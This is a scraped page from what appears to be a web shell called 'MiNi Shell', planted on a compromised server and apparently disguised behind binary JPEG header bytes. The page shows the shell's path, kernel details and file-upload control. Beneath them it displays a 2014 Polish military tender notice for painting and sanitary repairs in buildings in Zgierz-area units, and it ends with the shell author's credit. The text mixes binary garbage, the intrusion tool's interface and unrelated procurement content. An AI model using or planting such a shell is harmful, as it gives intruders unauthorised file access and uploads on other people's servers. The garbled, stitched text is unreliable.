JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140430/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140430/146492-N-2014.html

<p class="kh_header"><b>Zgierz: Roboty malarskie w budynku nr 61 w Nowym Glinniku(zadanie nr 1 ) ,          Roboty malarskie  budynku nr 133 w Nowym Glinniku  ( zadanie nr 2 ) ,       Remont sanitariatów w  budynku nr 39  w Tomaszowie Mazowieckim (zadanie nr 3 )  , Remont sanitariatów w  budynku nr 44    w Tomaszowie Mazowieckim ( zadanie nr 4 ) , Roboty malarskie w budynku nr 20 w Łodzi   ( zadanie nr 5 ) , Roboty malarskie w budynku nr 3 w Łodzi ( zadanie nr 6 ) NUMER SPRAWY 70/ZP/14</b><br>
<b>Numer ogłoszenia: 146492 - 2014; data zamieszczenia: 30.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 31 Wojskowy Oddział Gospodarczy , ul. Konstantynowska 85, 95-100 Zgierz, woj. łódzkie, tel. 42 750 20 98, faks 42 750 21 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.31wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty malarskie w budynku nr 61 w Nowym Glinniku(zadanie nr 1 ) ,          Roboty malarskie  budynku nr 133 w Nowym Glinniku  ( zadanie nr 2 ) ,       Remont sanitariatów w  budynku nr 39  w Tomaszowie Mazowieckim (zadanie nr 3 )  , Remont sanitariatów w  budynku nr 44    w Tomaszowie Mazowieckim ( zadanie nr 4 ) , Roboty malarskie w budynku nr 20 w Łodzi   ( zadanie nr 5 ) , Roboty malarskie w budynku nr 3 w Łodzi ( zadanie nr 6 ) NUMER SPRAWY 70/ZP/14.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia (numer sprawy 70/ZP/14) są roboty budowlane :
Roboty malarskie w budynku nr 61 w Nowym Glinniku ( zadanie nr 1 )         Roboty malarskie  budynku nr 133 w Nowym Glinniku  ( zadanie nr 2 )      Remont sanitariatów w  budynku nr 39  w Tomaszowie Mazowieckim           ( zadanie nr 3 )  , Remont sanitariatów w  budynku nr 44    w Tomaszowie Mazowieckim ( zadanie nr 4 ) , Roboty malarskie w budynku nr 20 w Łodzi     ( zadanie nr 5 ) , Roboty malarskie w budynku nr 3 w Łodzi ( zadanie nr 6 ) 
Szczegółowy opis przedmiotu zamówienia określają 
Dla Zadania nr 1 budynek nr  61 w Nowym Glinniku  
przedmiar robót  i specyfikacja techniczna  ( załącznik nr 9  do SIWZ )
Dla Zadania nr 2 budynek nr 133 w Nowym Glinniku 
przedmiar robót  i specyfikacja techniczna   ( załącznik nr 10  do SIWZ )	
Dla Zadania nr 3 budynek nr 39 w Tomaszowie Mazowieckim 
przedmiar robót  i specyfikacja techniczna  ( załącznik nr 11 do SIWZ )
Dla Zadania nr 4 budynek nr 44 w Tomaszowie Mazowieckim 
przedmiar robót  i specyfikacja techniczna  ( załącznik nr 12  do SIWZ )
Dla Zadania nr 5 budynek nr  w 20 w Łodzi  ul. Źródłowa 52 
przedmiar robót  i specyfikacja techniczna  ( załącznik nr 13  do SIWZ )
Dla Zadania nr 6 budynek nr 3 w Łodzi  ul. 1-go Maja 90 
przedmiar robót  i specyfikacja techniczna  ( załącznik nr 14  do SIWZ ).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-7, 45.44.21.00-8, 45.21.03.10-5, 45.33.20.00-3, 45.31.10.00-0, 45.41.00.00-4, 45.16.23.00-4, 45.26.26.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość oraz formy wniesienia wadium dla poszczególnych zadań zostały określone w SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę stosownego  oświadczenia   w trybie art. 22 ust. 1 pkt. 1  ustawy Pzp -  tj. wg załącznika  nr 2 do SIWZ. 
Zamawiający wykluczy Wykonawców, którzy nie wykażą spełniania warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż  posiada  doświadczenie zdobyte poprzez wykonanie zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone w okresie ostatnich 5 lat (a jeżeli okres działalności jest krótszy w tym okresie), przed upływem terminu składania ofert, co najmniej 2  robót budowlanych  odpowiadającej  przedmiotowi niniejszego zamówienia tj. w zakresie robót ogólno-budowlanych -  każda o wartości nie mniejszej niż : 
Dla zadania nr 1 - 40 000,00 zł brutto z podaniem ich rodzaju i wartości, daty i miejsca wykonywania - w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 2 - 30 000,00 zł brutto z podaniem ich rodzaju i wartości, daty i miejsca wykonywania - w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 3 - 80 000,00 zł brutto z podaniem ich rodzaju i wartości, daty i miejsca wykonywania - w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 4 - 40 000,00 zł brutto z podaniem ich rodzaju i wartości, daty i miejsca wykonywania - w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 5 - 40 000,00 zł brutto z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania - w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 6 - 40 000,00 zł brutto z podaniem ich rodzaju i wartości, daty i miejsca wykonywania - w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Uwaga: W przypadku złożenia oferty na kilka zadań ,  Wykonawca zobowiązany jest załączyć wykaz dwóch robót, przy czym wartość każdej nie może być mniejsza niż suma kwot odpowiadających poszczególnym zadaniom, w zakresie których realizację zamówienia Wykonawca oferuje. 
Jeżeli Wykonawca zaoferuje realizację zamówienia w zakresie zadania nr 1 i nr 2 wówczas musi wykazać należyte wykonanie co najmniej  dwóch robót  ogólno-budowlanych o wartości nie mniejszej niż 70.000,00 złotych brutto  każda   (40.000,00 + 30.000,00) 
Dla wszystkich zadań nr 1-6 Wykonawca musi wykazać należyte wykonanie co najmniej  dwóch robót  ogólno-budowlanych o wartości nie mniejszej niż  270 000,00 złotych brutto  każda wg załącznika nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę stosownego  oświadczenia   w trybie art. 22 ust. 1 pkt. 3          ustawy Pzp -  tj. wg załącznika  nr 2 do SIWZ. 
Zamawiający wykluczy Wykonawców, którzy nie wykażą spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania osobami zdolnymi do wykonania zamówienia za spełniony, jeżeli Wykonawca wykaże, iż dysponuje kierownikiem budowy posiadającym:
dla zadań  nr 1-6  - uprawnienia budowlane o specjalności konstrukcyjno budowlanej  bez ograniczeń lub w ograniczonym zakresie  należącym do Izby Inżynierów Budownictwa oraz co najmniej 12  miesięczne doświadczenie w pełnieniu funkcji kierownika budowy . 
dla zadań  nr 3,4 - uprawnienia budowlane o specjalności elektrycznej  bez ograniczeń lub w ograniczonym zakresie  należącym do Izby Inżynierów Budownictwa oraz co najmniej  12  miesięczne doświadczenie w pełnieniu funkcji kierownika budowy . 
dla zadań  nr 3,4 - uprawnienia budowlane o specjalności sanitarnej  bez ograniczeń lub w ograniczonym zakresie  należącym do Izby Inżynierów Budownictwa oraz co najmniej  12  miesięczne doświadczenie w pełnieniu funkcji kierownika budowy . 
Za spełnienie w/w warunku Zamawiający uzna zarówno wykazanie się
minimum jedną osobą posiadającą łącznie w/w uprawnienia jak 
i wykazanie się inną ilością osób posiadających łącznie w/w uprawnienia.
Zamawiający, określając wymogi dla wykazanej osoby, w zakresie   posiadanych uprawnień budowlanych dopuszcza odpowiadające im ważne  uprawnienia budowlane, jeżeli ich zakres odpowiada aktualnie obowiązującym przepisom ustawy z dnia 7 lipca 1994 r. Prawo budowlane    ( Dz.U. z 2013r. poz. 1409  z późn. zm. ) w zakresie niezbędnym do wykonania  przedmiotu zamówienia.  Warunek ten zostanie spełniony na podstawie złożonego przez Wykonawcę stosowanego  oświadczenia  tj.  wg załącznika  nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę stosownego  oświadczenia   w trybie art. 22 ust. 1 pkt. 4  ustawy Pzp -  tj. wg załącznika  nr 2 do SIWZ
Zamawiający wykluczy Wykonawców, którzy nie wykażą spełniania warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany w umowie mogą być dokonywane jedynie w sytuacjach określonych w art. 144 ustawy Pzp tj. w przypadku : 1) zmiany wynagrodzenia na mniejsze a) w przypadku wyłączeń obiektów z użytkowania bądź przekazania ich w inny zarząd, lub poza wojsko; b) robót rozliczeniowych , wynikających z różnicy przedmiarami a faktyczną ilością wynikającą z obmiaru; 2) zmiany osób funkcyjnych - kierownik budowy (po pisemnym poinformowaniu Zamawiającego o zaistniałej zmianie), inspektor nadzoru nie stanowią zmiany umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.31wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 31 WOG 95-100 Zgierz ul. Konstantynowska 85 budynek nr 1 pokój 104-105 pon.- pt. 7.30-15.30..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2014 godzina 10:00, miejsce: 31 WOG 95-100 ZGIERZ, UL.KONSTANTYNOWSKA 85 BUDYNEK NR 2,         I PIĘTRO, POK. NR 114 (KANCELARIA JAWNA)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roboty malarskie w budynku nr 61 w Nowym Glinniku ( zadanie nr 1 ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia określa 
Dla Zadania nr 1 budynek nr  61 w Nowym Glinniku  
przedmiar robót  i specyfikacja techniczna  ( załącznik nr 9  do SIWZ ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Roboty malarskie  budynku nr 133 w Nowym Glinniku  ( zadanie nr 2 ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia określa 
Dla Zadania nr 2 budynek nr 133 w Nowym Glinniku 
przedmiar robót  i specyfikacja techniczna   ( załącznik nr 10  do SIWZ ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont sanitariatów w  budynku nr 39           w Tomaszowie Mazowieckim ( zadanie nr 3 ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia określa 
Dla Zadania nr 3 budynek nr 39 w Tomaszowie Mazowieckim 
przedmiar robót  i specyfikacja techniczna  ( załącznik nr 11 do SIWZ ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.13.10-5, 45.33.20.00-3, 45.31.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont sanitariatów w  budynku nr 44           w Tomaszowie Mazowieckim ( zadanie nr 4 ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia określa 
Dla Zadania nr 4 budynek nr 44 w Tomaszowie Mazowieckim 
przedmiar robót  i specyfikacja techniczna  ( załącznik nr 12  do SIWZ ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.13.10-5, 45.33.20.00-3, 45.31.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zadanie nr 5 roboty malarskie w budynku nr 20 w Łodzi ul. Źródłowa 52.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia określa 
Dla Zadania nr 5 budynek nr  w 20 w Łodzi  ul. Źródłowa 52 
przedmiar robót  i specyfikacja techniczna  ( załącznik nr 13  do SIWZ ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8, 45.41.00.00-4, 45.16.23.00-4, 45.26.26.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zadanie nr 6 roboty malarskie budynek nr 3 w Łodzi  ul. 1-go Maja 90.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia określa
Dla Zadania nr 6 budynek nr 3 w Łodzi  ul. 1-go Maja 90 
przedmiar robót  i specyfikacja techniczna  ( załącznik nr 14  do SIWZ ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8, 45.26.26.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com